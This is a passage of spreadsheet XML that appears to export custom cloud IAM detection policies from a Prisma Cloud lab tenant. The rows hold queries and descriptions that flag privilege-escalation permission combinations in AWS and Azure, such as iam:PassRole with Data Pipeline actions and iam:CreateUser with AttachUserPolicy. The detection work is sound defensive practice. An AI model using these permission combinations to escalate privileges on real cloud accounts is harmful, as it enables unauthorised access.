      </c>
      <c r="AE3023" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3023" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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23" t="inlineStr">
        <is>
          <t>da2c1505-0c4e-49dc-a393-6221864e1022</t>
        </is>
      </c>
      <c r="AI3023" t="inlineStr">
        <is>
          <t>510dff53-f3e2-4ef4-bafb-ecee85502766</t>
        </is>
      </c>
      <c r="AJ3023" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3023" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3024">
      <c r="A3024" t="inlineStr"/>
      <c r="B3024" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3024" s="2" t="inlineStr"/>
      <c r="D3024" t="inlineStr"/>
      <c r="E3024" t="inlineStr"/>
      <c r="F3024" t="inlineStr"/>
      <c r="G3024" t="b">
        <v>0</v>
      </c>
      <c r="H30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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3024" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3024" t="inlineStr">
        <is>
          <t>test-iam</t>
        </is>
      </c>
      <c r="L3024" t="inlineStr"/>
      <c r="M3024" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3024" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3024" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3024" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3024" t="inlineStr"/>
      <c r="R3024" t="inlineStr"/>
      <c r="S3024" t="inlineStr"/>
      <c r="T3024" t="b">
        <v>0</v>
      </c>
      <c r="U3024" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3024" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3024" t="inlineStr">
        <is>
          <t>test-iam</t>
        </is>
      </c>
      <c r="X3024" t="inlineStr"/>
      <c r="Y3024" t="inlineStr"/>
      <c r="Z3024" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'datapipeline:ActivatePipeline', 'datapipeline:CreatePipeline', 'datapipeline:PutPipelineDefinition') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist</t>
        </is>
      </c>
      <c r="AA3024" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3024" t="inlineStr">
        <is>
          <t>2024-09-13 17:15:33</t>
        </is>
      </c>
      <c r="AC3024" t="inlineStr"/>
      <c r="AD3024" t="b">
        <v>0</v>
      </c>
      <c r="AE3024" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3024" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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4" t="inlineStr">
        <is>
          <t>8ae10057-8aa8-4e52-90e6-e4a45e6aaed0</t>
        </is>
      </c>
      <c r="AI3024" t="inlineStr">
        <is>
          <t>e66d2010-ffd1-4755-8cb3-d972d6c42233</t>
        </is>
      </c>
      <c r="AJ3024" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3024" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3025">
      <c r="A3025" t="inlineStr"/>
      <c r="B3025" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3025" s="2" t="inlineStr"/>
      <c r="D3025" t="inlineStr"/>
      <c r="E3025" t="inlineStr"/>
      <c r="F3025" t="inlineStr"/>
      <c r="G3025" t="b">
        <v>0</v>
      </c>
      <c r="H30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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3025" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3025" t="inlineStr">
        <is>
          <t>Testing Derivco</t>
        </is>
      </c>
      <c r="L3025" t="inlineStr"/>
      <c r="M3025" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3025" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3025" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3025" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3025" t="inlineStr"/>
      <c r="R3025" t="inlineStr"/>
      <c r="S3025" t="inlineStr"/>
      <c r="T3025" t="b">
        <v>0</v>
      </c>
      <c r="U3025" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3025" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3025" t="inlineStr"/>
      <c r="X3025" t="inlineStr"/>
      <c r="Y3025" t="inlineStr"/>
      <c r="Z3025" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND source.cloud.resource.type = 'user' AND grantedby.cloud.policy.name = 'DER Restricted Contributor' and grantedby.cloud.policy.type != 'Resource-based Policy' AND grantedby.cloud.type = 'AZURE' AND grantedby.cloud.entity.type = 'group' AND grantedby.level.type = 'Azure Management Group' AND dest.cloud.type = 'AZURE' AND dest.cloud.service.name = 'Microsoft.Resources'</t>
        </is>
      </c>
      <c r="AA3025" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3025" t="inlineStr">
        <is>
          <t>2024-09-13 17:09:42</t>
        </is>
      </c>
      <c r="AC3025" t="inlineStr"/>
      <c r="AD3025" t="b">
        <v>0</v>
      </c>
      <c r="AE3025" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3025" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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5" t="inlineStr">
        <is>
          <t>f15dafec-aa15-4f30-b702-1d29cd4f012a</t>
        </is>
      </c>
      <c r="AI3025" t="inlineStr">
        <is>
          <t>1700f5aa-ffbd-4d66-8d17-361ab9e2a69b</t>
        </is>
      </c>
      <c r="AJ3025" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3025" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3026">
      <c r="A3026" t="inlineStr"/>
      <c r="B3026" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3026" s="2" t="inlineStr"/>
      <c r="D3026" t="n">
        <v>0</v>
      </c>
      <c r="E3026" t="n">
        <v>10</v>
      </c>
      <c r="F3026" t="n">
        <v>0</v>
      </c>
      <c r="G3026" t="b">
        <v>1</v>
      </c>
      <c r="H30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26" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3026" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3026" t="inlineStr">
        <is>
          <t>granters - Azure AD user with the Azure built-in roles of Owner</t>
        </is>
      </c>
      <c r="L3026" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3026" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3026" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3026" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3026" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3026" t="inlineStr"/>
      <c r="R3026" t="inlineStr"/>
      <c r="S3026" t="inlineStr"/>
      <c r="T3026" t="b">
        <v>0</v>
      </c>
      <c r="U3026" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3026" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3026" t="inlineStr">
        <is>
          <t>Using the Azure built-in role of Owner with Azure AD users provides broad permissions sets that can lead to privilege escalation. A few examples are virtual machine lateral movement (like running commands on other VMs), storage account access and configuration access</t>
        </is>
      </c>
      <c r="X3026"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user from the list</t>
        </is>
      </c>
      <c r="Y3026" t="inlineStr"/>
      <c r="Z3026" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND source.cloud.resource.type = 'user' AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Owner'</t>
        </is>
      </c>
      <c r="AA3026" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3026" t="inlineStr">
        <is>
          <t>2024-09-19 15:47:47</t>
        </is>
      </c>
      <c r="AC3026" t="inlineStr"/>
      <c r="AD3026" t="b">
        <v>0</v>
      </c>
      <c r="AE3026" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3026" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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26" t="inlineStr">
        <is>
          <t>45d16fb5-eea8-43bd-a72f-ff6070f5b4bc</t>
        </is>
      </c>
      <c r="AI3026" t="inlineStr">
        <is>
          <t>9370db0b-6b0a-474f-8132-c8cd583a9356</t>
        </is>
      </c>
      <c r="AJ3026" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3026" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3027">
      <c r="A3027" t="inlineStr"/>
      <c r="B3027" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3027" s="2" t="inlineStr"/>
      <c r="D3027" t="inlineStr"/>
      <c r="E3027" t="inlineStr"/>
      <c r="F3027" t="inlineStr"/>
      <c r="G3027" t="b">
        <v>0</v>
      </c>
      <c r="H30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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3027" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3027" t="inlineStr">
        <is>
          <t>testIAMSAvedSearch</t>
        </is>
      </c>
      <c r="L3027" t="inlineStr"/>
      <c r="M3027" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3027" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3027" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3027" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3027" t="inlineStr"/>
      <c r="R3027" t="inlineStr"/>
      <c r="S3027" t="inlineStr"/>
      <c r="T3027" t="b">
        <v>0</v>
      </c>
      <c r="U3027" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3027" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3027" t="inlineStr"/>
      <c r="X3027" t="inlineStr"/>
      <c r="Y3027" t="inlineStr"/>
      <c r="Z3027" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AZURE' and dest.cloud.resource.name = '*'</t>
        </is>
      </c>
      <c r="AA3027" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3027" t="inlineStr">
        <is>
          <t>2023-12-15 20:01:14</t>
        </is>
      </c>
      <c r="AC3027" t="inlineStr"/>
      <c r="AD3027" t="b">
        <v>0</v>
      </c>
      <c r="AE3027" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3027" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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7" t="inlineStr">
        <is>
          <t>ada2348f-72a8-4b74-bebf-5a05e0985999</t>
        </is>
      </c>
      <c r="AI3027" t="inlineStr">
        <is>
          <t>969f13d2-c84a-4c81-bbbb-7640bb83feaf</t>
        </is>
      </c>
      <c r="AJ3027" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3027" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3028">
      <c r="A3028" t="inlineStr"/>
      <c r="B3028" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3028" s="2" t="inlineStr"/>
      <c r="D3028" t="n">
        <v>0</v>
      </c>
      <c r="E3028" t="n">
        <v>15</v>
      </c>
      <c r="F3028" t="n">
        <v>0</v>
      </c>
      <c r="G3028" t="b">
        <v>1</v>
      </c>
      <c r="H30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28" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3028" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3028" t="inlineStr">
        <is>
          <t>IAM_Test_Matt</t>
        </is>
      </c>
      <c r="L3028" t="inlineStr"/>
      <c r="M3028" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3028" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3028" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3028" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3028" t="inlineStr"/>
      <c r="R3028" t="inlineStr"/>
      <c r="S3028" t="inlineStr">
        <is>
          <t>IAM</t>
        </is>
      </c>
      <c r="T3028" t="b">
        <v>0</v>
      </c>
      <c r="U3028" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3028" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3028" t="inlineStr">
        <is>
          <t>Policy to detect  active overly permissive accounts that have not been used for more than 90 days on Azure.</t>
        </is>
      </c>
      <c r="X3028"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28" t="inlineStr"/>
      <c r="Z3028" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AZURE' AND grantedby.cloud.policy.isexcessive = true AND action.lastaccess.days &lt;= 90</t>
        </is>
      </c>
      <c r="AA3028" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3028" t="inlineStr">
        <is>
          <t>2024-11-12 19:10:58</t>
        </is>
      </c>
      <c r="AC3028" t="inlineStr"/>
      <c r="AD3028" t="b">
        <v>0</v>
      </c>
      <c r="AE3028" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3028" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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28" t="inlineStr">
        <is>
          <t>4bc61ed6-3c9e-475f-9adf-1db1268e820d</t>
        </is>
      </c>
      <c r="AI3028" t="inlineStr">
        <is>
          <t>22ff726d-c906-45d1-9571-29545df388d8</t>
        </is>
      </c>
      <c r="AJ3028" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3028" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3029">
      <c r="A3029" t="inlineStr"/>
      <c r="B3029" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3029" s="2" t="inlineStr"/>
      <c r="D3029" t="inlineStr"/>
      <c r="E3029" t="inlineStr"/>
      <c r="F3029" t="inlineStr"/>
      <c r="G3029" t="b">
        <v>0</v>
      </c>
      <c r="H30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29" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3029" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3029" t="inlineStr">
        <is>
          <t>okostine-test1</t>
        </is>
      </c>
      <c r="L3029" t="inlineStr"/>
      <c r="M3029" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3029" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3029" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3029" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3029" t="inlineStr"/>
      <c r="R3029" t="inlineStr"/>
      <c r="S3029" t="inlineStr">
        <is>
          <t>CIS,aws</t>
        </is>
      </c>
      <c r="T3029" t="b">
        <v>0</v>
      </c>
      <c r="U3029" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3029" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3029" t="inlineStr"/>
      <c r="X3029"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29" t="inlineStr"/>
      <c r="Z3029" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name IN( 'Key Vault Administrator','Key Vault Certificates Officer','Key Vault Crypto Officer','Key Vault Crypto Service Encryption User','Key Vault Crypto User','Key Vault Reader','Key Vault Secrets Officer','Key Vault Secrets User' )</t>
        </is>
      </c>
      <c r="AA3029" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3029" t="inlineStr">
        <is>
          <t>2024-11-12 18:57:59</t>
        </is>
      </c>
      <c r="AC3029" t="inlineStr"/>
      <c r="AD3029" t="b">
        <v>0</v>
      </c>
      <c r="AE3029" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3029" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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29" t="inlineStr">
        <is>
          <t>3f03780c-12e1-4c0b-9400-c6f5e05b4777</t>
        </is>
      </c>
      <c r="AI3029" t="inlineStr">
        <is>
          <t>b9cadde3-ecbe-494b-b168-1c219518b59f</t>
        </is>
      </c>
      <c r="AJ3029" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3029" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3030">
      <c r="A3030" t="inlineStr"/>
      <c r="B3030" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3030" s="2" t="inlineStr"/>
      <c r="D3030" t="inlineStr"/>
      <c r="E3030" t="inlineStr"/>
      <c r="F3030" t="inlineStr"/>
      <c r="G3030" t="b">
        <v>1</v>
      </c>
      <c r="H30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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J3030" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3030" t="inlineStr">
        <is>
          <t>Copy of Azure Managed Identity (user assigned or system assigned) with the Azure built-in roles of Contributor</t>
        </is>
      </c>
      <c r="L3030" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3030" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3030" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3030" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3030" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3030" t="inlineStr"/>
      <c r="R3030" t="inlineStr"/>
      <c r="S3030" t="inlineStr"/>
      <c r="T3030" t="b">
        <v>0</v>
      </c>
      <c r="U3030" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3030" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3030" t="inlineStr">
        <is>
          <t>Managed identities provide an automatic way for applications to connect to resources that support Azure Active Directory (Azure AD) authentication. Using the Azure built-in role of Contributor with managed identities provides broad permissions sets for a non-human identity that can lead to privilege escalation. A few examples are virtual machine lateral movement (like running commands on other VMs), storage account access and configuration access</t>
        </is>
      </c>
      <c r="X3030"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'Contributor' definition role that you want to examine and select the Assignments tab to view all the assignments associated with the selected role
7. Remove user assigned or system assigned managed identity from the list</t>
        </is>
      </c>
      <c r="Y3030" t="inlineStr"/>
      <c r="Z3030" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'Azure' AND grantedby.cloud.entity.type IN ( 'System Assigned', 'User Assigned' ) AND grantedby.cloud.policy.type = 'Built-in Role' AND grantedby.cloud.policy.name = 'Contributor'</t>
        </is>
      </c>
      <c r="AA3030" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3030" t="inlineStr">
        <is>
          <t>2024-11-11 15:52:25</t>
        </is>
      </c>
      <c r="AC3030" t="inlineStr"/>
      <c r="AD3030" t="b">
        <v>0</v>
      </c>
      <c r="AE3030" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3030" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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0" t="inlineStr">
        <is>
          <t>2dc9d5b2-9cae-4257-810e-f80ae13181da</t>
        </is>
      </c>
      <c r="AI3030" t="inlineStr">
        <is>
          <t>19d9bbe7-81b8-4531-a8d6-c9e29474e18c</t>
        </is>
      </c>
      <c r="AJ3030" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3030" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3031">
      <c r="A3031" t="inlineStr"/>
      <c r="B3031" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3031" s="2" t="inlineStr"/>
      <c r="D3031" t="n">
        <v>0</v>
      </c>
      <c r="E3031" t="n">
        <v>25</v>
      </c>
      <c r="F3031" t="n">
        <v>0</v>
      </c>
      <c r="G3031" t="b">
        <v>1</v>
      </c>
      <c r="H30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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3031" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3031" t="inlineStr">
        <is>
          <t>Cambios de Roles en ambientes AWS en los ultimos 90 dias</t>
        </is>
      </c>
      <c r="L3031" t="inlineStr"/>
      <c r="M3031" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3031" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3031" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3031" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3031" t="inlineStr"/>
      <c r="R3031" t="inlineStr"/>
      <c r="S3031" t="inlineStr"/>
      <c r="T3031" t="b">
        <v>0</v>
      </c>
      <c r="U3031" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3031" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3031" t="inlineStr">
        <is>
          <t>Cambios de Roles en ambientes AWS en los ultimos 90 dias</t>
        </is>
      </c>
      <c r="X3031" t="inlineStr"/>
      <c r="Y3031" t="inlineStr"/>
      <c r="Z3031" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.service.name = 'iam' AND grantedby.cloud.entity.type = 'role' AND action.lastaccess.days &gt; 90</t>
        </is>
      </c>
      <c r="AA3031" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3031" t="inlineStr">
        <is>
          <t>2024-09-19 15:50:04</t>
        </is>
      </c>
      <c r="AC3031" t="inlineStr"/>
      <c r="AD3031" t="b">
        <v>0</v>
      </c>
      <c r="AE3031" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3031" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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1" t="inlineStr">
        <is>
          <t>d6b4d2cd-9f2f-4634-926e-26d267e1fc2b</t>
        </is>
      </c>
      <c r="AI3031" t="inlineStr">
        <is>
          <t>436a22a5-6f26-4ab2-b975-1e26e43227b8</t>
        </is>
      </c>
      <c r="AJ3031" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3031" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3032">
      <c r="A3032" t="inlineStr"/>
      <c r="B3032" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3032" s="2" t="inlineStr"/>
      <c r="D3032" t="inlineStr"/>
      <c r="E3032" t="inlineStr"/>
      <c r="F3032" t="inlineStr"/>
      <c r="G3032" t="b">
        <v>0</v>
      </c>
      <c r="H30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32" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3032" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3032" t="inlineStr">
        <is>
          <t>AWS EC2 instance with IAM write access level - alagomez</t>
        </is>
      </c>
      <c r="L3032" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3032" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3032" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3032" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3032" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3032" t="inlineStr"/>
      <c r="R3032" t="inlineStr"/>
      <c r="S3032" t="inlineStr"/>
      <c r="T3032" t="b">
        <v>0</v>
      </c>
      <c r="U3032" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3032" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3032" t="inlineStr">
        <is>
          <t>This policy identifies IAM write permissions that are defined as risky permissions. Ensure that the AWS EC2 instances provisioned in your AWS account don't have a risky set of write permissions to minimize security risks.</t>
        </is>
      </c>
      <c r="X3032"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032" t="inlineStr"/>
      <c r="Z3032"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'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3032" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3032" t="inlineStr">
        <is>
          <t>2024-09-13 17:08:43</t>
        </is>
      </c>
      <c r="AC3032" t="inlineStr"/>
      <c r="AD3032" t="b">
        <v>0</v>
      </c>
      <c r="AE3032" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3032" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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32" t="inlineStr">
        <is>
          <t>433c4917-82ba-4b8a-a6e6-47986b248e00</t>
        </is>
      </c>
      <c r="AI3032" t="inlineStr">
        <is>
          <t>8bef368e-7b79-4828-a9cd-f4aa4fa8a3ce</t>
        </is>
      </c>
      <c r="AJ3032" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3032" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3033">
      <c r="A3033" t="inlineStr"/>
      <c r="B3033" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3033" s="2" t="inlineStr"/>
      <c r="D3033" t="n">
        <v>2</v>
      </c>
      <c r="E3033" t="n">
        <v>1</v>
      </c>
      <c r="F3033" t="n">
        <v>0</v>
      </c>
      <c r="G3033" t="b">
        <v>1</v>
      </c>
      <c r="H30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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3033" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3033" t="inlineStr">
        <is>
          <t>Tag kashan  for  AWS EC2 instance with the creation of a new User with attached policy permission</t>
        </is>
      </c>
      <c r="L3033" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3033" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3033" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3033" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3033" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3033" t="inlineStr"/>
      <c r="R3033" t="inlineStr"/>
      <c r="S3033" t="inlineStr"/>
      <c r="T3033" t="b">
        <v>0</v>
      </c>
      <c r="U3033" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3033" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3033" t="inlineStr">
        <is>
          <t>With access to 'iam:CreateUser', 'iam:AttachUserPolicy' permissions, an adversary can create IAM users with privileged permissions, expanding the surface of the attack and granting access to cloud resources with sensitive information.</t>
        </is>
      </c>
      <c r="X3033"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033" t="inlineStr"/>
      <c r="Z3033" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('iam:CreateUser','iam:AttachUserPolicy') AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3033" t="inlineStr">
